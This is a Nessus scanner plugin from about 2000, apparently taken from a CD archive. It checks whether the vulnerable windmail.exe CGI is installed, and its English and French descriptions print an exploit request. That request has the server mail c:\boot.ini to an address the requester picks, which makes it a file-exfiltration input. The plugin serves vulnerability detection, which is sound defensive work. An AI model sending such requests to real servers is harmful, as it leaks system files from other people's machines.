home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / windmail.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  89 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10365);
  10.  script_bugtraq_id(1073);
  11.  script_version ("$Revision: 1.15 $");
  12.  script_cve_id("CAN-2000-0242"); 
  13.  name["english"] = "Windmail.exe allows any user to execute arbitrary commands";
  14.  name["francais"] = "Windmail.exe allows any user to execute arbitrary comands";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "The 'windmail.exe' CGI is installed. 
  18.  
  19. Some versions of this CGI script have a security flaw that lets 
  20. an attacker execute arbitrary commands on the remote server.
  21.  
  22. To test this, make the following request :
  23.  
  24. GET /cgi-bin/windmail.exe?-n%20c:\boot.ini%20you@youraddress.com
  25.  
  26. (replace you@youraddress.com by your real email address). 
  27.  
  28. If you receive the content of the file boot.ini,
  29. then your server is vulnerable.
  30.  
  31. Solution : remove it from /cgi-bin. See www.geocel.com
  32.            for a new version.
  33.  
  34. Risk factor : High";
  35.  
  36.  
  37.  desc["francais"] = "Le cgi 'windmail.exe' est installΘ. Celui-ci possΦde
  38. un problΦme de sΘcuritΘ qui permet α n'importe qui de faire
  39. executer des commandes arbitraires au daemon http.
  40.  
  41. Pour dΘterminer si vous etes vulnΘrable, alors faites
  42. la requete :
  43.  
  44. GET /cgi-bin/windmail.exe?-n%20c:\boot.ini%20you@youraddress.com
  45.  
  46. (remplacez you@youraddress.com par votre vraie adresse email).
  47.  
  48. Si vous recevez le contenu du fichier boot.ini, alors vous
  49. etes vulnΘrable.
  50.  
  51.  
  52. Solution : retirez-le de /cgi-bin. Allez sur www.geocel.com pour
  53.            obtenir une nouvelle version.
  54.  
  55. Facteur de risque : SΘrieux";
  56.  
  57.  
  58.  script_description(english:desc["english"], francais:desc["francais"]);
  59.  
  60.  summary["english"] = "Checks for the presence of /cgi-bin/windmail.exe";
  61.  summary["francais"] = "VΘrifie la prΘsence de /cgi-bin/windmail.exe";
  62.  
  63.  script_summary(english:summary["english"], francais:summary["francais"]);
  64.  
  65.  script_category(ACT_GATHER_INFO);
  66.  
  67.  
  68.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  69.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  70.  family["english"] = "CGI abuses";
  71.  family["francais"] = "Abus de CGI";
  72.  script_family(english:family["english"], francais:family["francais"]);
  73.  script_dependencie("find_service.nes", "no404.nasl");
  74.  script_require_ports("Services/www", 80);
  75.  exit(0);
  76. }
  77.  
  78. #
  79. # The script code starts here
  80. #
  81.  
  82. include("http_func.inc");
  83. include("http_keepalive.inc");
  84. port = get_http_port(default:80);
  85.  
  86. res = is_cgi_installed_ka(item:"windmail.exe", port:port);
  87. if(res)security_hole(port);
  88.  
  89.